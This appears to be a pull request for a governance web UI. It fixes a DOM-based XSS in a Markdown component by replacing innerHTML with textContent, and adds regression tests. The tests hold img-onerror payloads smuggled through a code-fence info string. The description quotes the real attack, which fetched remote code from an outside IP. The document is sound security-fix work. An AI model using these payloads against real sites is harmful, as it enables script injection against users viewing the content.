### PR TITLE
fix(ui): render markdown code-fence language label as text

### DIFF
--- a/apps/ui/src/components/Ui/Markdown.test.ts
+++ b/apps/ui/src/components/Ui/Markdown.test.ts
@@ -1,0 +1,54 @@
+// @vitest-environment happy-dom
+import { mount } from '@vue/test-utils';
+import { expect, it, vi } from 'vitest';
+import Markdown from './Markdown.vue';
+
+vi.mock('@iconify-json/heroicons-outline', () => ({
+  icons: { icons: { duplicate: { body: '' }, check: { body: '' } } }
+}));
+
+const GLOBAL = {
+  stubs: {
+    'router-link': true
+  }
+};
+
+it('renders a fenced code block language label as text, not HTML', async () => {
+  const payload =
+    "```<img src=1 onerror=[].constructor.constructor(atob('aW1wb3J0'))()>\n# treasury transfer\n```";
+
+  const wrapper = mount(Markdown, {
+    props: { body: payload },
+    attachTo: document.body,
+    global: GLOBAL
+  });
+
+  await wrapper.vm.$nextTick();
+
+  expect(wrapper.element.querySelector('img')).toBeNull();
+  expect(wrapper.find('.title-bar').text()).toContain('<img');
+
+  wrapper.unmount();
+});
+
+it('does not execute onerror handlers smuggled through the fence info string', async () => {
+  const spy = vi.fn();
+  (window as any).__xssProbe = spy;
+
+  const payload = '```<img src=x onerror=window.__xssProbe()>\ncode\n```';
+
+  const wrapper = mount(Markdown, {
+    props: { body: payload },
+    attachTo: document.body,
+    global: GLOBAL
+  });
+
+  await wrapper.vm.$nextTick();
+  await new Promise(resolve => setTimeout(resolve, 0));
+
+  expect(spy).not.toHaveBeenCalled();
+  expect(wrapper.element.querySelector('img')).toBeNull();
+
+  delete (window as any).__xssProbe;
+  wrapper.unmount();
+});

--- a/apps/ui/src/components/Ui/Markdown.test.ts
+++ b/apps/ui/src/components/Ui/Markdown.test.ts
@@ -7,23 +7,14 @@ vi.mock('@iconify-json/heroicons-outline', () => ({
   icons: { icons: { duplicate: { body: '' }, check: { body: '' } } }
 }));
 
-const GLOBAL = {
-  stubs: {
-    'router-link': true
-  }
-};
-
-it('renders a fenced code block language label as text, not HTML', async () => {
+it('renders a fenced code block language label as text, not HTML', () => {
   const payload =
     "```<img src=1 onerror=[].constructor.constructor(atob('aW1wb3J0'))()>\n# treasury transfer\n```";
 
   const wrapper = mount(Markdown, {
     props: { body: payload },
-    attachTo: document.body,
-    global: GLOBAL
+    attachTo: document.body
   });
-
-  await wrapper.vm.$nextTick();
 
   expect(wrapper.element.querySelector('img')).toBeNull();
   expect(wrapper.find('.title-bar').text()).toContain('<img');
@@ -31,7 +22,7 @@ it('renders a fenced code block language label as text, not HTML', async () => {
   wrapper.unmount();
 });
 
-it('does not execute onerror handlers smuggled through the fence info string', async () => {
+it('does not execute onerror handlers smuggled through the fence info string', () => {
   const spy = vi.fn();
   (window as any).__xssProbe = spy;
 
@@ -39,12 +30,8 @@ it('does not execute onerror handlers smuggled through the fence info string', a
 
   const wrapper = mount(Markdown, {
     props: { body: payload },
-    attachTo: document.body,
-    global: GLOBAL
+    attachTo: document.body
   });
-
-  await wrapper.vm.$nextTick();
-  await new Promise(resolve => setTimeout(resolve, 0));
 
   expect(spy).not.toHaveBeenCalled();
   expect(wrapper.element.querySelector('img')).toBeNull();

--- a/apps/ui/src/components/Ui/Markdown.vue
+++ b/apps/ui/src/components/Ui/Markdown.vue
@@ -110,7 +110,7 @@ onMounted(() => {
     titleBar.classList.add('title-bar');
 
     const language = document.createElement('div');
-    language.innerHTML =
+    language.textContent =
       code.getAttribute('class')?.split('language-')[1] || '';
 
     titleBar.append(language);


### PR DESCRIPTION
A scam proposal on snapshot.box (rplgov.eth) carried an obfuscated JS payload that ran on render. It hid an `<img src=1 onerror=...>` in a fenced code block's info string, where the `onerror` did `import('http://20.199.49.114:3000/d')`.

Remarkable is configured with `html: false` and html rules disabled, so raw HTML in the body is correctly escaped and never executes. The leak was our own code: in `Markdown.vue`'s `onMounted` we build the code block's language label by reading the class attribute back with `getAttribute` (which the browser entity-decodes) and assigning it via `innerHTML`. That re-materialized the `<img onerror>` from the info string and fired it. This is a DOM-based XSS reachable by anyone who can post a proposal (or any markdown) that a victim views.

Fix is a one-liner: the language label is cosmetic text, so use `textContent` instead of `innerHTML`. That keeps it inert with no effect on legitimate content.

Test plan:
- Added `Markdown.test.ts` mounting the component with the actual payload and a probe variant; it asserts no `<img>` element is created and the `onerror` never runs. Confirmed the tests fail on the old `innerHTML` code and pass with `textContent`.
- `vitest run src/components/Ui` (15 tests) green; eslint clean on both files.